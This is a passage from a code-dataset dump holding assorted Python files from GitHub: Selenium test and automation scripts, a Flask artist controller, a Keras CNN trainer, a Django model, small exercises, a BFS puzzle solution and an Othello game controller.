HomePage(self.driver)\n checkoutpage = homepage.shopItems(\"Blackberry\")\n log.info(\"Getting the Card Titles\")\n checkoutpage.getappcard().click()\n log.info(\"Selected the required Mobile\")\n checkoutpage.getshpcheckoutbtn().click()\n log.info(\"Moving to Card Checkout page\")\n purchasepage = checkoutpage.getfnlcheckoutbtn()\n purchasepage.entercountry().send_keys(\"ind\")\n self.verifyLinkPresence(\"India\")\n purchasepage.selectcountry().click()\n log.info(\"Selected the country\")\n purchasepage.selectchkbox().click()\n purchasepage.selectsubmit().click()\n log.info(\"Submitted the Purchasing successfully\")\n purchasepage.chksuccess(\"Success\")\n\n @pytest.fixture(params=HomePageData.getTestData(\"Test2\"))\n def getData(self, request):\n return 
request.param","repo_name":"ssrrajan/pyseldemoframework","sub_path":"tests/test_e2e.py","file_name":"test_e2e.py","file_ext":"py","file_size_in_byte":2191,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"12106211661","text":"#----------------------------------------------------------------------------#\n# Imports\n#----------------------------------------------------------------------------#\n\nfrom flask import (Blueprint, render_template, request, flash, redirect, url_for)\nfrom forms import *\nfrom sqlalchemy import func\nfrom datetime import datetime\nfrom models import *\n\nartist_page = Blueprint('artist_page', __name__, template_folder='templates')\n\n# Artists\n# ----------------------------------------------------------------\n@artist_page.route('/artists')\ndef artists():\n \n artistdata = db.session.query(Artist.id, Artist.name).all()\n data = []\n for artist in artistdata:\n data.append({\"id\": artist.id, \"name\": artist.name})\n \n return render_template('pages/artists.html', artists=data)\n\n@artist_page.route('/artists/search', methods=['POST'])\ndef search_artists():\n\n search_term = request.form.get('search_term')\n if(',' in search_term) :\n n_search = search_term.split(',')\n artists = db.session.query(Artist.id, Artist.name).filter(Artist.city == n_search[0].strip()).filter(Artist.state == n_search[1].strip()).all();\n else :\n artists = db.session.query(Artist.id, Artist.name).filter(Artist.name.ilike('%'+search_term+'%')).all();\n\n data = []\n for artist in artists:\n upcomingshows = db.session.query(func.count(Shows.artist_id).label(\"tot\")).filter(Shows.artist_id == artist.id).filter(Shows.start_time > datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")).one()\n data.append({\"id\": artist.id, \"name\": artist.name, \"num_upcoming_shows\": upcomingshows.tot})\n \n response = {\"count\": len(artists), \"data\": data}\n \n return render_template('pages/search_artists.html', results=response, search_term=request.form.get('search_term', ''))\n\n@artist_page.route('/artists/')\ndef show_artist(artist_id):\n\n artistdata = db.session.query(Artist.id, Artist.name, Artist.genres, Artist.city, Artist.state, \n Artist.phone, Artist.website_link, Artist.facebook_link, Artist.seeking_venue, \n Artist.seeking_description, Artist.image_link).filter(Artist.id == artist_id).one()\n \n pastshows = db.session.query(Shows.venue_id, Shows.start_time,\n Venue.name.label(\"venue_name\"), \n Venue.image_link.label(\"venue_image_link\")\n ).join(Venue, Shows.venue_id == Venue.id).join(Artist, Shows.artist_id == Artist.id\n ).filter(Shows.artist_id == artist_id).filter(Shows.start_time < datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")).all()\n\n upcomingshows = db.session.query(Shows.venue_id, Shows.start_time,\n Venue.name.label(\"venue_name\"), \n Venue.image_link.label(\"venue_image_link\")\n ).join(Venue, Shows.venue_id == Venue.id).join(Artist, Shows.artist_id == Artist.id\n ).filter(Shows.artist_id == artist_id).filter(Shows.start_time > datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")).all()\n \n\n data = {\n \"id\": artistdata.id,\n \"name\": artistdata.name,\n \"genres\": artistdata.genres.replace(\"{\", \"\").replace(\"}\", \"\").split(','),\n \"city\": artistdata.city,\n \"state\": artistdata.state,\n \"phone\": artistdata.phone,\n \"website\": artistdata.website_link,\n \"facebook_link\": artistdata.facebook_link,\n \"seeking_venue\": artistdata.seeking_venue,\n \"seeking_description\": artistdata.seeking_description,\n 
\"image_link\": artistdata.image_link,\n \"past_shows_count\": len(pastshows),\n \"upcoming_shows_count\": len(upcomingshows)\n }\n\n data[\"past_shows\"] = []\n for shows in pastshows:\n psh = {\"venue_id\": shows.venue_id, \"venue_name\": shows.venue_name, \"venue_image_link\": shows.venue_image_link, \"start_time\": shows.start_time}\n data[\"past_shows\"].append(psh)\n\n data[\"upcoming_shows\"] = []\n for shows in upcomingshows:\n ush = {\"venue_id\": shows.venue_id, \"venue_name\": shows.venue_name, \"venue_image_link\": shows.venue_image_link, \"start_time\": shows.start_time}\n data[\"upcoming_shows\"].append(ush)\n\n \n return render_template('pages/show_artist.html', artist=data)\n\n# Update\n# ----------------------------------------------------------------\n@artist_page.route('/artists//edit', methods=['GET'])\ndef edit_artist(artist_id):\n\n form = ArtistForm()\n artist = Artist.query.get(artist_id)\n \n return render_template('forms/edit_artist.html', form=form, artist=artist)\n\n@artist_page.route('/artists//edit', methods=['POST'])\ndef edit_artist_submission(artist_id):\n\n form = ArtistForm(request.form)\n try:\n artist = Artist.query.get(artist_id)\n form.populate_obj(artist)\n db.session.commit()\n flash('Artist ' + request.form['name'] + ' was successfully updated!')\n except ValueError as e:\n print(e)\n flash('An error occurred. Artist ' + request.form['name'] + ' could not be updated.')\n db.session.rollback()\n finally:\n db.session.close()\n\n return redirect(url_for('artist_page.show_artist', artist_id=artist_id))\n\n\n# Create Artist\n# ----------------------------------------------------------------\n\n@artist_page.route('/artists/create', methods=['GET'])\ndef create_artist_form():\n form = ArtistForm()\n return render_template('forms/new_artist.html', form=form)\n\n@artist_page.route('/artists/create', methods=['POST'])\ndef create_artist_submission():\n\n form = ArtistForm(request.form)\n try:\n artist = Artist()\n form.populate_obj(artist)\n db.session.add(artist)\n db.session.commit()\n flash('Artist ' + request.form['name'] + ' was successfully listed!')\n except ValueError as e:\n print(e)\n flash('An error occurred. Artist ' + request.form['name'] + ' could not be listed.')\n db.session.rollback()\n finally:\n db.session.close()\n\n \n # e.g., flash('An error occurred. 
Artist ' + data.name + ' could not be listed.')\n #return render_template('pages/home.html')\n return redirect(url_for('index'))\n\n\n","repo_name":"OlanSal/fyyur-webapp-project","sub_path":"controllers/artists.py","file_name":"artists.py","file_ext":"py","file_size_in_byte":6030,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"37546426605","text":"import xlrd\nfrom selenium import webdriver\nfrom webdriver_manager.chrome import ChromeDriverManager\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver import ActionChains\nimport time\n\ndriver = webdriver.Chrome(ChromeDriverManager().install())\ndriver.implicitly_wait(10)\ndriver.get('https://www.orangehrm.com/orangehrm-30-day-trial/')\n\nurl= driver.find_element(By.ID,'Form_submitForm_subdomain')\nfirstname = driver.find_element(By.ID,'Form_submitForm_FirstName')\nlastname = driver.find_element(By.ID,'Form_submitForm_LastName')\nemailid= driver.find_element(By.ID,'Form_submitForm_Email')\njobtitle= driver.find_element(By.ID,'Form_submitForm_JobTitle')\ncompany= driver.find_element(By.ID,'Form_submitForm_CompanyName')\nphone= driver.find_element(By.ID,'Form_submitForm_Contact')\ntotalemp= driver.find_element(By.ID,'Form_submitForm_NoOfEmployees')\nindustry= driver.find_element(By.ID,'Form_submitForm_Industry')\ncountry= driver.find_element(By.ID,'Form_submitForm_Country')\n\n\n\n\n\nworkbook= xlrd.open_workbook('file_example_XLS_10.xls')\n\n\n#get total row count\nsheet= workbook.sheet_by_name(\"registration\")\nrowcount = sheet.nrows\ncolnum = sheet.ncols\nprint(\"Total row count\",rowcount,\"Total col count\",colnum)\nfor row_con in range(1, rowcount):\n url_= sheet.cell_value(row_con,0)\n first_name = sheet.cell_value(row_con,1)\n last_name = sheet.cell_value(row_con, 2)\n email_id = sheet.cell_value(row_con, 3)\n job_title = sheet.cell_value(row_con, 4)\n company_ = sheet.cell_value(row_con, 5)\n phone_ = sheet.cell_value(row_con, 6)\n total_emp = sheet.cell_value(row_con, 7)\n industry_ = sheet.cell_value(row_con, 8)\n country_ = sheet.cell_value(row_con, 9)\n\n url.clear()\n url.send_keys(url_)\n firstname.clear()\n firstname.send_keys(first_name)\n lastname.clear()\n lastname.send_keys(last_name)\n emailid.clear()\n emailid.send_keys(email_id)\n jobtitle.clear()\n jobtitle.send_keys(job_title)\n phone.clear()\n phone.send_keys(phone_)\n country.send_keys(country_)\n\ndriver.quit()\n","repo_name":"sagarpitla/SeleniumProject","sub_path":"ExcelRead.py","file_name":"ExcelRead.py","file_ext":"py","file_size_in_byte":2050,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"35140418122","text":"import os\r\nimport numpy as np\r\nimport pandas as pd\r\nfrom keras.models import Sequential\r\nfrom keras.layers import Dense, Conv2D, MaxPooling2D, Dropout, Flatten\r\nfrom keras.preprocessing.image import ImageDataGenerator\r\nfrom keras.callbacks import EarlyStopping, ReduceLROnPlateau\r\nfrom keras.regularizers import l2\r\n\r\n# Set your data directory\r\ndata_dir = './dataset'\r\n\r\n# Hyperparameters\r\nbatch_size = 32\r\ninput_shape = (64, 64, 3)\r\nepochs = 50\r\npatience = 10\r\n\r\n# Define the CNN architecture\r\nmodel = Sequential()\r\n\r\nmodel.add(Conv2D(32, (3, 3), padding='same', activation='relu', input_shape=input_shape))\r\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\r\nmodel.add(Dropout(0.3))\r\n\r\nmodel.add(Conv2D(64, (3, 3), padding='same', 
activation='relu'))\r\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\r\nmodel.add(Dropout(0.3))\r\n\r\nmodel.add(Conv2D(128, (3, 3), padding='same', activation='relu'))\r\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\r\nmodel.add(Dropout(0.3))\r\n\r\nmodel.add(Flatten())\r\n\r\nmodel.add(Dense(512, activation='relu', kernel_regularizer=l2(0.001)))\r\nmodel.add(Dropout(0.5))\r\n\r\nmodel.add(Dense(3, activation='softmax'))\r\n\r\n# Use a smaller initial learning rate\r\nfrom keras.optimizers import Adam\r\noptimizer = Adam(learning_rate=0.0001)\r\n\r\nmodel.compile(optimizer=optimizer, loss='categorical_crossentropy', metrics=['accuracy'])\r\n\r\n# Prepare the data generators\r\ntrain_datagen = ImageDataGenerator(rescale=1./255, shear_range=0.2, zoom_range=0.2, horizontal_flip=True)\r\ntest_datagen = ImageDataGenerator(rescale=1./255)\r\n\r\ntrain_generator = train_datagen.flow_from_directory(\r\n os.path.join(data_dir, 'train'),\r\n target_size=input_shape[:2],\r\n batch_size=batch_size,\r\n class_mode='categorical')\r\n\r\ntest_generator = test_datagen.flow_from_directory(\r\n os.path.join(data_dir, 'test'),\r\n target_size=input_shape[:2],\r\n batch_size=batch_size,\r\n class_mode='categorical')\r\n\r\n# Define early stopping\r\nearly_stopping = EarlyStopping(monitor='val_loss', patience=patience, verbose=1, mode='min', restore_best_weights=True)\r\n\r\n# Add a learning rate scheduler\r\nreduce_lr = ReduceLROnPlateau(monitor='val_loss', factor=0.2, patience=5, min_lr=0.00001, verbose=1)\r\n\r\n# Train the model\r\nhistory = model.fit(train_generator, epochs=epochs, validation_data=test_generator, callbacks=[early_stopping, reduce_lr])\r\n\r\n# Save the model\r\nmodel.save('asl_cnn_model.h5')\r\n\r\n# Evaluate the model on the test set\r\nscores = model.evaluate(test_generator)\r\n\r\nprint('Test loss:', scores[0])\r\nprint('Test accuracy:', scores[1])\r\n\r\n","repo_name":"UMAIRAHMED-111/American-Sign-Language-Interpreter-CNN","sub_path":"ModelTrain.py","file_name":"ModelTrain.py","file_ext":"py","file_size_in_byte":2525,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"39846922681","text":"from setuptools import setup\nfrom os import path\n\nhere = path.abspath(path.dirname(__file__))\n\nwith open(path.join(here, 'README.rst'), encoding='utf-8') as f:\n long_description = f.read()\n\nsetup(\n name='cache.me',\n version='0.1.1',\n description='A library for caching function calls.',\n long_description=long_description,\n url='https://github.com/jaredlgillespie/cache.me',\n author='Jared Gillespie',\n author_email='jaredlgillespie@hotmail.com',\n license='MIT',\n classifiers=[\n 'Development Status :: 5 - Production/Stable',\n 'Intended Audience :: Developers',\n 'License :: OSI Approved :: MIT License',\n 'Natural Language :: English',\n 'Operating System :: OS Independent',\n 'Programming Language :: Python :: 3',\n 'Programming Language :: Python :: 3.4',\n 'Programming Language :: Python :: 3.5',\n 'Programming Language :: Python :: 3.6',\n 'Programming Language :: Python :: Implementation :: CPython',\n 'Topic :: Software Development :: Libraries :: Python Modules',\n 'Topic :: Utilities'\n ],\n keywords='cache.me cache decorator',\n packages=['cachme'],\n test_suite='tests'\n)\n","repo_name":"JaredLGillespie/cache.me","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1205,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"48"} 
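# Typical commands for building/installing the package defined by the
# setup() call above (standard setuptools workflow; nothing here is
# specific to cache.me beyond the 'tests' suite it names):
#
#     python -m pip install .            # install from the source tree
#     python setup.py sdist bdist_wheel  # build distributions
#     python setup.py test               # run the declared test suite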
+{"seq_id":"37784647771","text":"from django.db import models\nfrom ckeditor.fields import RichTextField\nfrom PIL import Image\ntry:\n from StringIO import StringIO\nexcept ImportError:\n from io import StringIO\nfrom django.core.files.base import ContentFile\n# Create your models here.\n\nclass OurChildren(models.Model):\n first_name = models.CharField(max_length=50, null=True, blank=True)\n last_name = models.CharField(max_length=50, blank=True, null=True)\n age = models.IntegerField(blank=True, null=True)\n content = RichTextField()\n\n image = models.ImageField(upload_to = \"static/images/our_children\")\n\n\n def __str__(self):\n return \" %s %s\" % (self.first_name , self.last_name)\n\n def get_name(self):\n return (self.first_name)\n\n def get_thumbnail(self, thumb_size=None):\n\n base = Image.open(StringIO(self.image.read())) # get the image\n size = thumb_size\n if not thumb_size:\n rate = 0.2\n size = base.size\n size = (int(size[0] * rate), int(size[1] * rate))\n base.thumbnail(size)\n thumbnail = StringIO()\n base.save(thumbnail, 'PNG')\n thumbnail = ContentFile(thumbnail.getvalue())\n return thumbnail","repo_name":"Abenezeryakob/FreedomCharity","sub_path":"project/our_children/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1194,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"30112816113","text":"def old_macdonald(name):\n first_part = name[:3]\n second_half = name[3:]\n return first_part.capitalize() + second_half.capitalize()\n\n\n# Check\nprint(old_macdonald('macdonald'))\n\n\ndef master_yoda(text):\n list_to_reverse = text.split(' ')\n list_to_reverse.reverse()\n return ' '.join(list_to_reverse)\n\n\n# Check\nprint(master_yoda('I am home'))\nprint(master_yoda('We are ready'))\n\n\ndef almost_there(n):\n return (abs(100 - n) <= 10) or (abs(200 - n) <= 10)\n\n\n# Check\nprint(almost_there(104))\nprint(almost_there(150))\nprint(almost_there(209))\n","repo_name":"JAntonioMarin/PythonBootcamp","sub_path":"Section6/46.py","file_name":"46.py","file_ext":"py","file_size_in_byte":555,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"74292749904","text":"from selenium.webdriver import Firefox\nfrom selenium.webdriver.common.keys import Keys\nimport time\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support import expected_conditions as EC\nimport csv\nurl\t= 'https://login.live.com/oauth20_authorize.srf?response_type=token&client_id=000000004C18365E&redirect_uri=https%3A%2F%2Fto-do.live.com%2Ftasks%2Fauth%2Fcallback&scope=https://graph.microsoft.com/User.Read&state=eyJ0b2tlblR5cGUiOiJncmFwaFRva2VuIiwiZmxvd1R5cGUiOiJtc2EifQ==&aadredir=1'\n\nnavegador\t= Firefox()\n\nnavegador.get(url)\ntime.sleep(6)\nelemento\t= navegador.find_element_by_xpath(\"//input[@class='form-control ltr_override input ext-input text-box ext-text-box' and @name='loginfmt']\")\nelemento.click()\nelemento.clear()\nelemento.send_keys(\"EMAIL@outlook.com\")\nbotao_elemento\t= navegador.find_element_by_id('idSIButton9')\nbotao_elemento.click()\ntime.sleep(5)\nsenha_elemento\t= navegador.find_element_by_xpath(\"//input[@class='form-control input ext-input text-box ext-text-box' and @name='passwd']\")\nsenha_elemento.click()\nsenha_elemento.clear()\nsenha_elemento.send_keys(\"SENHA@123\")\nbotao_elemento\t= 
navegador.find_element_by_id('idSIButton9')\nbotao_elemento.click()\ntime.sleep(5)\nbotao_elemento\t= navegador.find_element_by_id('idSIButton9')\nbotao_elemento.click()\ntime.sleep(10)\n\n\n\ndef nova_tarefa(tarefa):\n\tnova_tarefa\t= navegador.find_element_by_id('baseAddInput-addTask') # Locate the add-task input\n\tnova_tarefa.send_keys(tarefa) # Type the task name\n\tnova_tarefa.send_keys(Keys.RETURN)\ndef nova_lista(lista):\n\tnova_lista\t= navegador.find_element_by_id('baseAddInput-addList')\n\tnova_lista.send_keys(lista) # Type the list name\n\tnova_lista.send_keys(Keys.RETURN) # Press Enter to create it\n\t\nnova_lista('Livros') \nvalidar_lista\t= navegador.find_element_by_xpath(f\"//span[text()='Livros']\") # Look up the list that was just created\nvalidar_lista.click()\nnova_tarefa('A arte da Guerra')\nnova_tarefa('A Cauda Longa')\nnova_tarefa('A Torre Negra')\nvalidar_lista.click() \nvalidar_tarefa\t= navegador.find_elements_by_xpath('//span[@class=\"checkBox big\"]')\nlistando_livros\t= navegador.find_elements_by_class_name(\"taskItem-title\")\nachando_importante = navegador.find_elements_by_xpath('//span[@class=\"importanceButton\"]')\nachando_importante[0].click()\n\n# Validation\n\n\ntime.sleep(3)\n\n\n\ntry:\n\tachando_titulo_criado = navegador.execute_script(\"\"\" return Array.prototype.slice.call(document.getElementsByClassName(\"listItem-title listItem-titleParsed\")).filter(function (x) { return x.textContent === \"Livros\";});\"\"\")\n\tassert len(achando_titulo_criado) == 1\n\tnome_correto = achando_titulo_criado[0].text\n\tvalidador = nome_correto == 'Livros'\n\tprint(f\"Lista foi criado? : {validador}\")\n\nexcept:\n\tprint(\"Titulo não criado\")\n\ntime.sleep(2)\n\nachando_nome_criado\t = navegador.find_elements_by_xpath('//span[@class=\"taskItem-title\"]')\n\n\nnome1 = achando_nome_criado[0].text\nnome2 = achando_nome_criado[1].text\nnome3 = achando_nome_criado[2].text\n\nprint(\"Teste de Nomes criados: A Cauda Longa, A arte da Guerra, A torre Negra\")\nif nome2 == 'A Cauda Longa':\n\tprint(\"Teste: OK\")\nelse:\n\tprint(\"Teste: ERRO\")\nif nome3 == 'A arte da Guerra':\n\tprint(\"Teste: OK\")\nelse:\n\tprint(\"Teste: ERRO\")\nif nome1 == 'A Torre Negra':\n\tprint(\"Teste: OK\")\nelse:\n\tprint(\"Teste: ERRO\")\n\ntime.sleep(2)\n\n\nvalidar_importante = achando_nome_criado[1].find_element_by_xpath('//span[@class=\"importanceButton color-theme\"]')\n\ntry:\n\tvalidar_importante.find_element_by_xpath('//i[@class=\"icon fontIcon ms-Icon ms-Icon--FavoriteStarFill iconSize-20\"]')\n\tprint(\"A torre negra está como importante\")\nexcept:\n\tprint(\"A torre negra não está como importante\")\n\n\n\n\narq_listas_livros = open('livros.csv', 'r')\nlista_livros = arq_listas_livros.read().split('\\n')\narq_listas_livros.close()\n\nlivro1 = lista_livros[1]\nlivro2 = lista_livros[2]\nlivro3 = lista_livros[3]\nlivro4 = lista_livros[4]\nlivro5 = lista_livros[5]\nlivro6 = lista_livros[6]\nlivro7 = lista_livros[7]\nlivro8 = lista_livros[8]\nlivro9 = lista_livros[9]\nlivro10 = lista_livros[10]\n\n\nnova_lista('Meus Livros')\nnova_tarefa(f'{livro1}')\ntime.sleep(2)\nnova_tarefa(f'{livro2}')\ntime.sleep(2)\nnova_tarefa(f'{livro3}')\ntime.sleep(2)\nnova_tarefa(f'{livro4}')\ntime.sleep(2)\nnova_tarefa(f'{livro5}')\ntime.sleep(2)\nnova_tarefa(f'{livro6}')\ntime.sleep(2)\nnova_tarefa(f'{livro7}')\ntime.sleep(2)\nnova_tarefa(f'{livro8}')\ntime.sleep(2)\nnova_tarefa(f'{livro9}')\ntime.sleep(2)\nnova_tarefa(f'{livro10}')\n\ntime.sleep(3)\nvalidar_tarefa_ativa = 
navegador.find_element_by_xpath('//li[@class=\"listItem-container active\"]')\nvalidar_tarefa\t= validar_tarefa_ativa.find_elements_by_xpath('//span[@class=\"checkBox big\"]')\nlistando_livros\t= validar_tarefa_ativa.find_elements_by_class_name(\"taskItem-title\")\nachando_checkbox\t= validar_tarefa_ativa.find_elements_by_xpath('//span[@class=\"checkBox big\"]')\nachando_checkbox[0].click()\nachando_checkbox\t= validar_tarefa_ativa.find_elements_by_xpath('//span[@class=\"checkBox big\"]')\nachando_checkbox[1].click()\nachando_importante = validar_tarefa_ativa.find_elements_by_xpath('//span[@class=\"importanceButton\"]')\nachando_importante[4].click()\nachando_importante = validar_tarefa_ativa.find_elements_by_xpath('//span[@class=\"importanceButton\"]')\nachando_importante[5].click()\nachando_importante = validar_tarefa_ativa.find_elements_by_xpath('//span[@class=\"importanceButton\"]')\nachando_importante[6].click()\n\ntry:\n\tachando_titulo_criado = navegador.execute_script(\"\"\" return Array.prototype.slice.call(document.getElementsByClassName(\"listItem-title listItem-titleParsed\")).filter(function (x) { return x.textContent === \"Meus Livros\";});\"\"\")\n\tassert len(achando_titulo_criado) == 1\n\n\tnome_correto = achando_titulo_criado[0].text\n\tvalidador = nome_correto == 'Meus Livros'\n\tprint(f\"Lista foi criado? : {validador}\")\n\nexcept:\n\tprint(\"Titulo não criado\")\n\nachando_nome_criado\t = validar_tarefa_ativa.find_elements_by_xpath('//span[@class=\"taskItem-title\"]')\n\n\nwitcher = achando_nome_criado[0].text\ndificil = achando_nome_criado[1].text\nportugues = achando_nome_criado[2].text\nler = achando_nome_criado[3].text\nviagem = achando_nome_criado[4].text\ngalaxia = achando_nome_criado[5].text\ninteligencia = achando_nome_criado[6].text\nsapiens = achando_nome_criado[7].text\nscrum = achando_nome_criado[8].text\nsherlock = achando_nome_criado[9].text\nprint(\"Teste de Nomes criados:\")\nif inteligencia == 'Como aprender inteligencia':\n\tprint(\"Teste: OK\")\nelse:\n\tprint('Teste: ERRO')\nif witcher == 'The Witcher: O último desejo':\n\tprint(\"Teste: OK\")\nelse:\n\tprint(\"Teste: ERRO\")\nif portugues == 'Guia pratico do portugues correto VOL 1':\n\tprint(\"Teste: OK\")\nelse:\n\tprint(\"Teste: ERRO\")\nif ler == 'Como Ler Livros':\n\tprint(\"Teste: OK\")\nelse:\n\tprint(\"Teste: ERRO\")\nif viagem == 'Esta não é mais uma historia sobre viagens no tempo':\n\tprint(\"Teste: OK\")\nelse:\n\tprint(\"Teste: ERRO\")\nif galaxia == 'Guia do mochilheiro da galaxia':\n\tprint(\"Teste: OK\")\nelse:\n\tprint(\"Teste: ERRO\")\nif dificil == 'O Lado Dificil das situaçoes dificeis':\n\tprint(\"Teste: OK\")\nelse:\n\tprint(\"Teste: ERRO\")\nif sapiens == 'Uma breve historia da humanidade: Sapiens':\n\tprint(\"Teste: OK\")\nelse:\n\tprint(\"Teste: ERRO\")\nif sherlock == 'Sherlock Holmes':\n\tprint(\"Teste: OK\")\nelse:\n\tprint(\"Teste: ERRO\")\nif scrum == 'SCRUM a arte de fazer o dobro do trabalho pela metade do tempo':\n\tprint(\"Teste: OK\")\nelse:\n\tprint(\"Teste: ERRO\")\n\n\nvalidar_importante = achando_nome_criado[8].find_element_by_xpath('//span[@class=\"importanceButton color-theme\"]')\n\ntry:\n\tvalidar_importante.find_element_by_xpath('//i[@class=\"icon fontIcon ms-Icon ms-Icon--FavoriteStarFill iconSize-20\"]')\n\tprint(\"está como importante: OK\")\nexcept:\n\tprint(\"ESTÁ COMO IMPORTANTE : ERRO \")\n\nvalidar_importante = achando_nome_criado[1].find_element_by_xpath('//span[@class=\"importanceButton 
color-theme\"]')\n\ntry:\n\tvalidar_importante.find_element_by_xpath('//i[@class=\"icon fontIcon ms-Icon ms-Icon--FavoriteStarFill iconSize-20\"]')\n\tprint(\"está como importante: OK\")\nexcept:\n\tprint(\"ESTÁ COMO IMPORTANTE : ERRO \")\n\nvalidar_importante = achando_nome_criado[0].find_element_by_xpath('//span[@class=\"importanceButton color-theme\"]')\n\ntry:\n\tvalidar_importante.find_element_by_xpath('//i[@class=\"icon fontIcon ms-Icon ms-Icon--FavoriteStarFill iconSize-20\"]')\n\tprint(\"está como importante: OK\")\nexcept:\n\tprint(\"ESTÁ COMO IMPORTANTE : ERRO \")\n\t\n\n","repo_name":"lealcb/exercicio2","sub_path":"Automação WEB.py","file_name":"Automação WEB.py","file_ext":"py","file_size_in_byte":8359,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"73971061266","text":"import sys\nfrom collections import deque\n\ninput=sys.stdin.readline\n\nm,n,h=map(int,input().split())\ngraph=[[[] for _ in range(n)] for _ in range(h)]\nflag0=False\ndef pr(graph):\n for i in graph:\n for j in i:\n for hh in j:\n print(hh,end=\" \")\n print()\n print()\n print()\n\nfor hh in range(h):\n for i in range(n):\n li=list(map(int,input().split()))\n for j in li:\n if j==0:\n flag0=True\n graph[hh][i].append(j)\n\nif flag0==False:\n print(0)\n\ndx=[0,0,0,0,1,-1]\ndy=[0,0,-1,1,0,0]\ndh=[-1,1,0,0,0,0]\nq=deque()\n\ndef bfs(q):\n count=0\n while q:\n a=[]\n while q:\n now=q.popleft()\n for i in range(6):\n nh=now[0]+dh[i]\n nx=now[1]+dx[i]\n ny=now[2]+dy[i]\n if not 0<=nh0:\n flag=True\nif flag==True:\n print(-1)\nelif flag0==True:\n print(v)\n\n\n","repo_name":"Yoo-sumi/Programmers","sub_path":"백준/DFS_BFS/7579.py","file_name":"7579.py","file_ext":"py","file_size_in_byte":1497,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"32351350806","text":"# Ryan Martin\n# Dr. Mullen\n# CS5001\n# 12/05/2018\n\nfrom piece import Piece\nfrom move import Move\nimport sys\n\n\nclass GameController:\n \"\"\"Indicates the beginnning and ending of the game.\"\"\"\n def __init__(self, width, piece):\n self.width = width\n self.counter = 0\n self.piece = piece\n self.area = [[0, 1], [1, 1], [1, 0], [1, -1],\n [0, -1], [-1, -1], [-1, 0], [-1, 1]]\n self.valid_list = []\n self.second_turn_counter = 0\n\n def start_game(self, row, column):\n if self.valid(row, column):\n if self.counter % 2 == 0:\n self.piece.total_row[row][column].display('True')\n self.flip_piece(row, column)\n self.counter += 1\n print(\"Computers's turn.\")\n\n def valid_helper(self):\n \"\"\" A method that checks for available legal moves for player\"\"\"\n self.valid_list = []\n if self.counter % 2 == 0:\n current_player = 'player'\n other_player = 'Computer'\n else:\n current_player = 'Computer'\n other_player = 'Player'\n\n for i in range(8):\n for j in range(8):\n if self.valid(i, j):\n self.valid_list.append([i, j])\n if len(self.valid_list) > 0:\n valid_helper = True\n else:\n print(\"No valid move for {}. 
{}'s turn.\".format(current_player,\n other_player))\n valid_helper = False\n self.counter += 1\n return valid_helper\n\n def on_edge(self, row, column):\n \"\"\"A helper method that will help the computer choose the best move\n int\"\"\"\n if row == 0 or column == 7 or column == 0 or row == 7:\n return True\n\n def on_corner(self, row, column):\n \"\"\"A helper method that will help the computer choose the second best move\n int\"\"\"\n if (row == 0 and column == 0) or (row == 0 and column == 7) or \\\n (row == 7 and column == 0) or (row == 7 and column == 7):\n return True\n\n def on_third(self, row, column):\n \"\"\"A helper method that will help the computer choose the third best move\n int\"\"\"\n if row == 2 or column == 5 or column == 2 or row == 5:\n return True\n\n def computer_moves(self):\n \"\"\"An AI that ranks the best moves and makes the moves based on open spaces\n List -> List\"\"\"\n self.second_turn_counter = 0\n best_move = ''\n if self.valid_helper():\n temp_y, temp_x = self.valid_list[0]\n temp = len(self.piece.total_row[temp_y][temp_x].flips_list)\n for row, column in self.valid_list:\n if self.on_corner(row, column):\n y = row\n x = column\n break\n elif self.on_edge(row, column):\n y = row\n x = column\n best_move = 'Second'\n continue\n elif self.on_third(row, column):\n if best_move == 'Second':\n continue\n else:\n y = row\n x = column\n best_move = 'Third'\n continue\n else:\n if best_move == 'Second' or best_move == 'Third':\n continue\n else:\n if len(self.piece.total_row[row][column].flips_list)\\\n >= temp:\n y = row\n x = column\n temp = len(self.piece.total_row[y][x].flips_list)\n else:\n continue\n\n self.piece.total_row[y][x].display('False')\n self.flip_piece(y, x)\n self.counter += 1\n print(\"Player's turn.\")\n if not self.valid_helper():\n self.second_turn_counter += 1\n if not self.valid_helper():\n self.second_turn_counter += 1\n else:\n self.second_turn_counter += 1\n if not self.valid_helper():\n self.second_turn_counter += 1\n\n if self.second_turn_counter == 2:\n print('No moves for either player. 
Gameover.')\n self.game_over()\n\n def valid(self, row, column):\n valid_area = False\n other_color = self.other_color()\n current_color = self.current_color()\n\n for y_value, x_value in self.area:\n y = row\n x = column\n y += y_value\n x += x_value\n if not self.on_board(y, x):\n continue\n else:\n if self.piece.total_row[row][column].color == 3 \\\n and self.piece.total_row[y][x].color == other_color:\n while True:\n x += x_value\n y += y_value\n if not self.on_board(y, x):\n break\n elif self.piece.total_row[y][x].color == current_color:\n valid_area = True\n while True:\n x -= x_value\n y -= y_value\n if y == row and x == column:\n break\n self.piece.total_row[row][column].flips_list\\\n .append(self.piece.total_row[y][x])\n break\n return valid_area\n\n def flip_piece(self, row, column):\n \"\"\"A method which displays the pieces after they are captured\"\"\"\n for move in self.piece.total_row[row][column].flips_list:\n if self.counter % 2 == 0:\n move.display('True')\n else:\n move.display('False')\n\n def current_color(self):\n other_color = self.other_color()\n if other_color == 1:\n current_color = 0\n else:\n current_color = 1\n return 